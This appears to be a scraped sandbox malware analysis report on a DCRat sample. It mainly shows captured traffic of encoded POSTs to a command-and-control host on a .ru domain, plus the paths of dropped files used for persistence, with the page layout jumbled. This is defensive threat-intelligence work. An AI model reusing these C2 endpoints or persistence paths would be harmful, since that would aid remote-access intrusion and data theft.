Dec 10, 2024 19:00:43.360889912 CET	956	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TP5NapwYvACnO%2BgzjTb2gVNTcZnTrB4OAOjn%2F%2FxapJxXE6XOQeYYkQRRep6gKF47WG%2BNuOtZNWIPY4XeME45E5DqnQfEWb8CrOWnNqP3eTzry1bnj6KuuCU238xFSl45OvT1DefBNG0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff22d108e44255-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4204&min_rtt=1644&rtt_var=5736&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2151&delivery_rate=65988&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 03 15 27 59 20 02 23 55 36 54 2e 04 2e 2a 20 5c 39 28 27 17 2e 38 25 58 22 17 07 02 2d 05 3a 5b 3f 2b 0a 01 32 0c 3a 1d 24 25 2d 1a 3d 0e 28 51 06 1c 25 5a 30 2a 00 53 2a 3f 3d 5f 30 03 2c 5a 3d 34 26 02 3d 00 05 15 34 3b 28 16 31 3d 02 0d 3f 2f 3e 0e 24 05 2a 18 3b 0d 3a 01 27 3d 2a 51 00 16 21 53 29 21 3c 11 34 30 29 0a 35 54 28 5f 3f 43 28 02 30 04 37 0d 27 02 00 10 25 2c 28 05 33 11 0f 52 25 3f 23 17 23 11 27 55 27 33 23 5d 2d 03 28 57 00 3f 5a 4f 0d 0a Data Ascii: 98'Y #U6T..* \9('.8%X"-:[?+2:$%-=(Q%Z0S?=_0,Z=4&=4;(1=?/>$;:'=Q!S)!<40)5T(_?C(07'%,(3R%?##'U'3#]-(W?ZO
Dec 10, 2024 19:00:43.536107063 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:41.628906965 CET	323	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2520 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 19:00:41.981077909 CET	2520	OUT	Data Raw: 55 58 5d 5e 58 5d 50 56 5c 56 5b 59 50 5d 5a 5b 50 5e 59 58 50 5a 53 5b 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: UX]^X]PV\V[YP]Z[P^YXPZS[_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#&=?+"70*7!^4+\07Y&P"+-\//("1/+$_" X(+
Dec 10, 2024 19:00:42.720081091 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:42.974268913 CET	813	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61AUcrmeM9aikNba3PPFru5yd1a0upSYuC0va%2BFVaVahz3aqrvjcwcAiZsfntK4MqSd%2BBilBCb%2FjhR13UBM0lCLoBElil2FVEZNhtMpPOEJlG2rqOss%2FG5Z1IjUt6vw4dYV75TGumzk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff22d20cd743b6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3156&min_rtt=1682&rtt_var=3580&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2843&delivery_rate=108308&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:43.251519918 CET	299	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue
Dec 10, 2024 19:00:43.604105949 CET	2528	OUT	Data Raw: 50 59 5d 5d 5d 5c 55 50 5c 56 5b 59 50 58 5a 50 50 54 59 5e 50 54 53 5b 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: PY]]]\UP\V[YPXZPPTY^PTS[_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#Y131? !7')$9Z7/+['+'Y%(94^2,751W/+$_" X(7
Dec 10, 2024 19:00:44.338522911 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:44.805742979 CET	810	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWrOZp5etg4Jw9Ld9XU8%2BI6VF3TjfmuuaFcjJkZn3sw8oOKwqeGLzTwxY%2BbsJLNJKIhoXZVzyqjUj5xTOMQj2OeihECFii2aZ168GLYWSJfVKuXzPXF89roKLYOVBVkd%2FHAHy4QsMek%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff22dc29ef42f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4083&min_rtt=1822&rtt_var=5206&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=73315&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:45.774935961 CET	323	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 19:00:46.119743109 CET	2528	OUT	Data Raw: 55 5d 58 5e 58 5d 50 53 5c 56 5b 59 50 5a 5a 50 50 59 59 5f 50 5a 53 5e 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: U]X^X]PS\V[YPZZPPYY_PZS^_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#'0-<$["7=1_"/?X3;4$+%U7+!\/< !#R.+$_" X(
Dec 10, 2024 19:00:46.861001015 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:47.299036026 CET	813	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QfH730%2BtJd3FrxVlv9uKt9bdmsSdNS8I2yzxK8OfxQUytPi1UoHZ6j%2FUXKgPsonAq9mMNCSxdAErXLxpvTtyXXkYNqhD0QuUG4ynxRYh3B%2BjMxubo4d73D%2BqOE14veIOiYszS9tPOQ8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff22ebecb043f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7409&min_rtt=2109&rtt_var=11391&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2851&delivery_rate=32800&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:47.770802021 CET	323	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 19:00:48.125957012 CET	2528	OUT	Data Raw: 55 5e 5d 5a 5d 5f 50 57 5c 56 5b 59 50 5a 5a 59 50 5c 59 59 50 58 53 5b 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: U^]Z]_PW\V[YPZZYP\YYPXS[_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#]%5\<<'"7(D)71"<%+;^&8! 8)8+Z"24.+$_" X(
Dec 10, 2024 19:00:48.860356092 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:49.125060081 CET	808	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eTM9TYw8BdX4UFHxPUIut4wagX8pKrolprSixovnSUAq7uKEY57CcPLCcTTUX9Jt1kt2am%2BuK3EoS4M1z35QVRQmsTB%2B70MVJgN8BspcqhsoPWI28SdqqLPftUSJvA4GHOlb13Ur5qA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff22f86d2f4263-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3772&min_rtt=2116&rtt_var=4107&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2851&delivery_rate=94990&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:49.065103054 CET	323	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 1828 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 19:00:49.416738033 CET	1828	OUT	Data Raw: 55 58 5d 5f 5d 5e 50 50 5c 56 5b 59 50 5b 5a 5c 50 5d 59 5d 50 55 53 5a 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: UX]_]^PP\V[YP[Z\P]Y]PUSZ_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#]%6=? "'?=B2 /;$X2864;"/Y4 2;R;+$_" X(;
Dec 10, 2024 19:00:50.184459925 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:50.701200962 CET	963	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g34HIv0fdlrHnHK23hdBAwWpjENqa7%2BZSW9LW7HijHVdT5llJQ%2B2MRegUqDpsEM5aR5y8pQM9QFK%2B2TiHf2oqa3IWEulu582mxk3Uix8D%2BswnlgE9PNQr5tzu%2BjiQbSRXyxkCJoA4l8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff2300ab502363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4008&min_rtt=2002&rtt_var=4763&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2151&delivery_rate=80868&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 03 15 24 02 20 05 3c 08 21 22 2e 05 39 39 2c 58 2c 28 38 04 3a 38 36 06 35 00 21 03 2e 3f 26 12 28 2b 23 58 31 31 29 06 30 0f 31 52 3d 0e 28 51 06 1c 26 05 24 2a 0b 08 3f 3c 25 5a 24 5b 3c 5a 2a 09 21 5f 29 3d 27 51 23 3b 16 5f 25 2d 01 54 28 11 22 0b 27 05 26 1c 38 0d 0c 02 31 07 2a 51 00 16 21 18 29 21 3f 01 37 0e 26 1c 21 0c 16 19 3c 26 3b 59 25 3d 3b 08 33 02 31 04 33 05 38 00 30 2f 31 53 24 2f 3f 59 34 3f 3c 08 31 09 23 5d 2d 03 28 57 00 3f 5a 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 98$ <!".99,X,(8:865!.?&(+#X11)01R=(Q&$?<%Z$[<Z!_)='Q#;_%-T("'&81*Q!)!?7&!<&;Y%=;31380/1S$/?Y4?<1#]-(W?ZO0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0wdppTE7Op.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe

C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe:Zone.Identifier

C:\Program Files\Windows NT\TableTextService\dc45010803acc5

C:\ProgramData\Microsoft OneDrive\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe

C:\ProgramData\Microsoft OneDrive\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe:Zone.Identifier

C:\ProgramData\Microsoft OneDrive\dc45010803acc5

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0wdppTE7Op.exe.log

Windows Analysis Report
0wdppTE7Op.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:54.318562984 CET	299	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue
Dec 10, 2024 19:00:54.667876959 CET	2528	OUT	Data Raw: 50 5f 5d 53 5d 5a 50 50 5c 56 5b 59 50 5f 5a 5b 50 5b 59 5c 50 5d 53 5c 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: P_]S]ZPP\V[YP_Z[P[Y\P]S\_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#^23?853+7"7<+]38<&;-72-/+!1#V/$_" X(+
Dec 10, 2024 19:00:55.404506922 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:55.685343027 CET	814	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSFiInRCU9%2F2pJZA1HYLkUqPxZmWo%2Filhz4ACDRAn6f1fKQpI1FliGKrivlXereHZwW1o0xs%2FwEWS%2Ftc4rIvwYqJhAuuJG%2Bmibk4xYzmd9fqDyWUVUuP8VhKbXfBUZ78XaqdB0WpGUY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff23214b2e43d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3612&min_rtt=1736&rtt_var=4403&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=87195&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0
Dec 10, 2024 19:00:55.714540005 CET	299	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 1828 Expect: 100-continue
Dec 10, 2024 19:00:56.072851896 CET	1828	OUT	Data Raw: 50 59 5d 5d 5d 5f 50 50 5c 56 5b 59 50 5f 5a 5e 50 5f 59 5b 50 58 53 59 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: PY]]]_PP\V[YP_Z^P_Y[PXSY_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#12?0Y#70=.#<?$( $+9V#(=/<'6R8$_" X(+
Dec 10, 2024 19:00:56.141458988 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:57.099606037 CET	966	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCH6l0jhRQEJURKisClTD%2FujaueQPYtj1kAJBCN7NmbrjHMtJ2CsKcoi5RL5VS0jByaJp5mK81dK2JAuqXBP1HxwTb7eqmPRWYuW%2BYZRguQxHvFD06c%2F3vdZRrY%2FA34L1v4s61XcPC0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff2325aa5943d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10482&min_rtt=1736&rtt_var=17042&sent=12&recv=15&lost=0&retrans=1&sent_bytes=869&recv_bytes=4954&delivery_rate=89422&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 03 15 27 12 20 15 20 08 22 1c 25 13 3a 00 24 59 2d 2b 33 59 3a 3b 36 01 23 2a 3d 06 2e 02 2d 06 28 3b 05 10 26 54 2d 07 27 26 25 53 3e 1e 28 51 06 1c 25 5c 24 29 3e 56 3f 06 39 1c 25 3e 23 03 2a 37 26 03 2a 00 30 0b 34 38 38 5a 31 2e 33 55 3f 2f 3e 0b 24 2c 0f 44 2c 30 21 5a 26 07 2a 51 00 16 21 50 2b 1f 15 03 37 20 0b 0b 22 0c 16 5c 3c 25 2f 12 25 3d 01 0c 33 05 2a 5c 30 05 3b 16 25 2f 26 0a 30 3c 06 04 20 59 3b 19 26 33 23 5d 2d 03 28 57 00 3f 5a 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 98' "%:$Y-+3Y:;6#=.-(;&T-'&%S>(Q%\$)>V?9%>#7&0488Z1.3U?/>$,D,0!Z&Q!P+7 "\<%/%=3*\0;%/&0< Y;&3#]-(W?ZO0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:56.064647913 CET	299	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue
Dec 10, 2024 19:00:56.416743994 CET	2528	OUT	Data Raw: 55 5c 5d 59 5d 5c 55 50 5c 56 5b 59 50 5b 5a 5b 50 55 59 58 50 5f 53 5d 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: U\]Y]\UP\V[YP[Z[PUYXP_S]_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_ 20><(!8E)=4Z4381;.#+=8? 1,$_" X(;
Dec 10, 2024 19:00:57.220814943 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:57.987340927 CET	815	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xx87n%2BwtngtEl3FXhU3yL730AEWZtWZVtW79KxrRX5nVVq1AKIJ9h8gDTHROuZPlKGvH%2Fa30gPzeZgP6AJPDKPRntHgRj%2BqW55FMYuPT%2FPD5v9VqMoC2Bb6LF9d%2Bc0MhjIhIKCJABxM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff232caddc18c4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3096&min_rtt=1685&rtt_var=3455&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=112498&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:58.631071091 CET	299	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue
Dec 10, 2024 19:00:58.979231119 CET	2528	OUT	Data Raw: 55 5a 5d 5a 5d 56 55 50 5c 56 5b 59 50 5c 5a 58 50 5d 59 5a 50 5d 53 5a 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: UZ]Z]VUP\V[YP\ZXP]YZP]SZ_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#\2[+<3#$$@>:#<$(%8=P7",85,,$_" X('
Dec 10, 2024 19:00:59.752785921 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:01:00.476277113 CET	819	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:01:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LfKyfEWHZMLVAiU7AtsU%2BnV%2BxIvz8q6ksWJv5JHKMTfTrL6U7e%2FlpitcBgkcQt%2FgwkNOwJ6V0VokcYQctOgthqg22CHbO%2FVCsC39fFvD4nO5bqunyICg3IXm5%2FI0XtHx648x5n%2FtkUA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff233c7e3a0f4b-EWR alt-svc: h3=":443"; ma=86400 server-timing: 